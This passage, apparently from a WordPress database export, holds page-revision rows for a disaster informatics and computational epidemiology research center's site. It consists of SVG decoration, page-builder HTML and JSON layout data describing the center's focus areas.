1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h37\" class=\"h-x-container style-677 style-local-22-h37 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h37-group style-677-spacing style-local-22-h37-spacing\"><span class=\"h-button__outer style-678-outer style-local-22-h38-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/members/our-mission/\"  data-colibri-id=\"22-h38\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-678 style-local-22-h38 position-relative\"><!----><!----> <span>our mission</span></a>\n                    </span>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n            <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-04-29 08:54:56','2022-04-29 12:54:56','',22,'https://gsudice.dataconn.net/?p=1283',0,'revision','',0),(1287,1,'2022-04-29 09:16:29','2022-04-29 13:16:29','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c5\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c7\",\"parentId\":\"20-c6\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c7\",\"index\":0,\"id\":\"20-c8\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c6\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c10\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c10\",\"index\":0,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c12\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c14\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c14\",\"index\":0,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c16\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c17\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c18\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c18\",\"index\":0,\"id\":\"20-c19\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c20\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c21\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c9\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-04-29 09:16:29','2022-04-29 13:16:29','',168,'https://gsudice.dataconn.net/?p=1287',0,'revision','',0),(1288,1,'2022-04-29 09:16:29','2022-04-29 13:16:29','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c5-outer\">\n            <div data-colibri-id=\"20-c5\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c5 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c6 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c7-outer\">\n            <div data-colibri-id=\"20-c7\" class=\"d-flex h-flex-basis h-column__inner 